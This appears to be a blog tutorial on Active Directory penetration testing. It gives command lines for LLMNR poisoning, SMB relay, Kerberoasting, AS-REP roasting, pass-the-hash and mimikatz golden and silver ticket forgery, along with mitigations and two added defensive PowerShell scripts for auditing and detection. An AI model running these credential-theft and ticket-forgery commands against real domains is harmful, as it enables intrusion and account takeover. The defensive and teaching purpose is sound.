2025-02-07
After overcoming network challenges and successfully connecting vulnerable Windows machines to a domain controller, the next critical step in penetration testing is understanding and exploiting initial attack vectors in Active Directory (AD). This article provides practical commands and techniques to identify and exploit these vectors, ensuring a robust understanding of AD security.
1. Enumeration with PowerView
PowerView is a PowerShell tool used for AD enumeration. It helps identify users, groups, and permissions.
Import-Module .\PowerView.ps1
Get-NetUser | Select-Object samaccountname, description
Get-NetGroup -GroupName "Domain Admins"
2. LLMNR/NBT-NS Poisoning
Attackers can exploit LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) to intercept credentials.
sudo responder -I eth0 -wrf
3. SMB Relay Attacks
SMB Relay attacks allow attackers to relay captured SMB authentication attempts to other machines that do not require SMB signing.
sudo ntlmrelayx.py -tf targets.txt -smb2support
4. Kerberoasting
Kerberoasting requests service tickets for accounts that have an SPN and cracks the tickets offline to recover the service account credentials.
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "service/MSSQLSvc"
5. AS-REP Roasting
AS-REP Roasting targets users with Kerberos pre-authentication disabled.
GetNPUsers.py -dc-ip 192.168.1.1 domain/ -usersfile users.txt -format hashcat -outputfile hashes.txt
6. Pass-the-Hash
This technique allows attackers to authenticate with a captured NTLM hash without knowing the plaintext password.
pth-winexe -U admin%aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 //192.168.1.10 cmd
7. Golden Ticket Attack
A Golden Ticket is a forged TGT signed with the krbtgt account hash; it grants unrestricted access to the domain.
mimikatz # kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:hash /ptt
8. Silver Ticket Attack
A Silver Ticket is a forged service ticket signed with a service account hash; it provides access to that specific service only.
mimikatz # kerberos::golden /user:ServiceAccount /domain:domain.com /sid:S-1-5-21-123456789-1234567890-123456789 /target:service.domain.com /service:HTTP /rc4:hash /ptt
9. BloodHound for AD Mapping
BloodHound visualizes AD attack paths.
sudo neo4j start
bloodhound --no-sandbox
10. Mitigation Techniques
- Disable LLMNR and NBT-NS.
- Enforce SMB signing.
- Enable Kerberos pre-authentication.
- Regularly audit AD permissions.
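The following script is an added example and not part of the original post. It is a read-only audit of the four mitigations listed above, written by this editor: it reads the registry values that disable LLMNR and NBT-NS, checks whether SMB signing is required on both the server and client side, lists accounts that still have Kerberos pre-authentication disabled, and reports the membership of the privileged groups that should be reviewed regularly. It assumes an elevated PowerShell session on a domain-joined host with the RSAT ActiveDirectory module installed; the function names are the author's own choices, while the registry paths, the userAccountControl bit and the group names are the standard Windows ones.

```powershell
# Added example, not from the original post: read-only audit of the four
# mitigations above. Assumes an elevated session on a domain-joined host with
# the RSAT ActiveDirectory module; function names are the author's own.
#Requires -Modules ActiveDirectory

function Get-RegValueOrNull {
    param([string]$Path, [string]$Name)
    # $null means the value is absent and the Windows default applies.
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Test-LlmnrNbtnsDisabled {
    # LLMNR is off when the DNSClient policy value EnableMulticast is 0.
    $llmnr = Get-RegValueOrNull 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' 'EnableMulticast'
    # NBT-NS is off per interface when NetbiosOptions is 2.
    $ifaces = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    $nbtOn  = @($ifaces | Where-Object { (Get-RegValueOrNull $_.PSPath 'NetbiosOptions') -ne 2 })
    [pscustomobject]@{
        Check  = 'LLMNR and NBT-NS disabled'
        Pass   = ($llmnr -eq 0) -and ($nbtOn.Count -eq 0)
        Detail = "EnableMulticast=$llmnr; interfaces with NetBIOS enabled=$($nbtOn.Count)"
    }
}

function Test-SmbSigningRequired {
    # The server-side value blocks relays to this host; the client-side value
    # stops this host from authenticating to an unsigned (possibly rogue) server.
    $srv = Get-RegValueOrNull 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' 'RequireSecuritySignature'
    $cli = Get-RegValueOrNull 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' 'RequireSecuritySignature'
    [pscustomobject]@{
        Check  = 'SMB signing required'
        Pass   = ($srv -eq 1) -and ($cli -eq 1)
        Detail = "Server=$srv; Client=$cli"
    }
}

function Test-PreAuthEnforced {
    # DONT_REQ_PREAUTH is userAccountControl bit 0x400000 (4194304); any account
    # carrying it is exposed to AS-REP roasting.
    $users = @(Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)')
    [pscustomobject]@{
        Check  = 'Kerberos pre-authentication enforced'
        Pass   = ($users.Count -eq 0)
        Detail = "Accounts without pre-auth: $($users.SamAccountName -join ', ')"
    }
}

function Get-PrivilegedGroupReport {
    # Membership of high-value groups, with an SPN flag: a privileged account
    # that also carries an SPN is a Kerberoasting target and needs a long password.
    foreach ($g in 'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators') {
        $members = @(Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue |
                     Where-Object { $_.objectClass -eq 'user' })
        foreach ($m in $members) {
            $u = Get-ADUser -Identity $m.SamAccountName -Properties ServicePrincipalName, PasswordLastSet
            [pscustomobject]@{
                Group           = $g
                Account         = $u.SamAccountName
                HasSpn          = ($u.ServicePrincipalName.Count -gt 0)
                PasswordLastSet = $u.PasswordLastSet
            }
        }
    }
}

$checks = @((Test-LlmnrNbtnsDisabled), (Test-SmbSigningRequired), (Test-PreAuthEnforced))
$checks | Format-Table Check, Pass, Detail -AutoSize
Get-PrivilegedGroupReport | Format-Table -AutoSize
```

The registry checks reflect the local host only, so run the script on a representative sample of workstations and servers rather than on one machine; a Group Policy that sets these values will show up here only after it has applied. A `Pass` of `False` on the pre-authentication check names the exact accounts to fix, and any row in the group report with `HasSpn` equal to `True` deserves a review of whether the SPN is still needed.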
What Undercode Say
Active Directory is a cornerstone of enterprise environments, making it a prime target for attackers. Understanding initial attack vectors is crucial for both offensive and defensive cybersecurity professionals. Below are additional Linux-based commands and tools to enhance your AD security knowledge:
1. Impacket Suite: A collection of Python scripts for AD exploitation.
python3 GetADUsers.py -dc-ip 192.168.1.1 domain/user -all
2. CrackMapExec: A Swiss Army knife for AD environments.
crackmapexec smb 192.168.1.0/24 -u user -p password --shares
3. LDAP Search: Query AD for sensitive information.
ldapsearch -x -h 192.168.1.1 -b "dc=domain,dc=com" "(objectClass=user)"
4. Nmap for AD Enumeration:
nmap --script smb-enum-users.nse -p 445 192.168.1.1
5. Wireshark for Traffic Analysis:
Capture and analyze Kerberos traffic to detect anomalies.
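As an added example (not part of the original post), the script below runs the same two Kerberos anomaly checks a defender would look for in a capture, but against the Security log of a domain controller, which is where they are easiest to collect at scale: TGT requests (event 4768) granted without pre-authentication, the AS-REP roasting pattern from section 5, and bursts of RC4-encrypted service ticket requests (event 4769) for user accounts from one client, the Kerberoasting pattern from section 4. It assumes it is run on a domain controller (or against a forwarded copy of its log) with rights to read the Security log, and that the audit subcategories "Kerberos Authentication Service" and "Kerberos Service Ticket Operations" are enabled; the function names, the lookback window and the threshold are the author's own choices, while the event IDs and field names are the standard Windows ones.

```powershell
# Added example, not from the original post: Kerberos anomaly detection from
# a domain controller's Security log. Event IDs and field names are the
# standard ones; the function names and thresholds are the author's own.
param(
    [int]$LookbackHours = 24,
    [int]$KerberoastThreshold = 5   # distinct RC4 service tickets from one client
)

function ConvertFrom-KerberosEvent {
    # Flatten one 4768/4769 record into the fields the checks below need.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    $d = @{}
    foreach ($item in $xml.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }
    [pscustomobject]@{
        Time    = $Event.TimeCreated
        Id      = $Event.Id
        Account = $d['TargetUserName']
        Service = $d['ServiceName']
        Client  = ($d['IpAddress'] -replace '^::ffff:', '')   # strip the IPv4-mapped prefix
        EncType = $d['TicketEncryptionType']
        PreAuth = $d['PreAuthType']
        Status  = $d['Status']
    }
}

function Find-AsRepRoastingSignals {
    param([object[]]$Events)
    # 4768 with PreAuthType 0: the TGT was issued without pre-authentication,
    # so the encrypted part of the AS-REP can be attacked offline.
    $Events | Where-Object { $_.Id -eq 4768 -and $_.PreAuth -eq '0' -and $_.Status -eq '0x0' }
}

function Find-KerberoastingSignals {
    param([object[]]$Events)
    # 4769 with RC4 (0x17) for a user service account (not a computer account
    # ending in $, not krbtgt), grouped by requesting client; many distinct
    # services from one client in a short window is the classic pattern.
    $Events |
        Where-Object { $_.Id -eq 4769 -and $_.EncType -eq '0x17' -and $_.Status -eq '0x0' -and
                       $_.Service -notlike '*$' -and $_.Service -ne 'krbtgt' } |
        Group-Object Client |
        ForEach-Object {
            $services = @($_.Group.Service | Sort-Object -Unique)
            [pscustomobject]@{
                Client           = $_.Name
                Requester        = (@($_.Group.Account | Sort-Object -Unique) -join ', ')
                DistinctServices = $services.Count
                Services         = ($services -join ', ')
                Suspicious       = ($services.Count -ge $KerberoastThreshold)
            }
        }
}

$raw = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4768, 4769
    StartTime = (Get-Date).AddHours(-$LookbackHours)
} -ErrorAction SilentlyContinue
$events = @($raw | ForEach-Object { ConvertFrom-KerberosEvent $_ })

"AS-REP roasting signals (4768 without pre-authentication):"
Find-AsRepRoastingSignals $events | Format-Table Time, Account, Client, EncType -AutoSize
"Kerberoasting signals (RC4 service tickets per client, threshold $KerberoastThreshold):"
Find-KerberoastingSignals $events | Where-Object { $_.Suspicious } | Format-Table -AutoSize
```

Both checks are indicators rather than proof: legacy applications that only negotiate RC4 will also produce 0x17 service tickets, so tune the threshold per environment and treat the list of requesting clients as a starting point for triage. Moving service accounts to AES-only keys (msDS-SupportedEncryptionTypes) makes the RC4 check far more precise, because any remaining 0x17 request then stands out on its own.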
6. GPO Auditing:
Use `gpresult` to review Group Policy Objects applied to machines.
gpresult /r
7. Privilege Escalation:
Use `winpeas` to identify misconfigurations.
winpeas.exe
8. Password Policy Auditing:
Check password policies using `net accounts`.
net accounts
9. SMB Vulnerability Scanning:
Use `smbclient` to list the shares a host exposes over SMB.
smbclient -L 192.168.1.1
10. Kerberos Configuration:
Review the Kerberos tickets cached on a host with `klist`.
klist
For further reading, explore these resources:
By mastering these techniques and tools, you can better secure your AD environment and mitigate potential threats. Remember, cybersecurity is a continuous learning process—stay curious and keep improving!
References:
Hackers Feeds, Undercode AI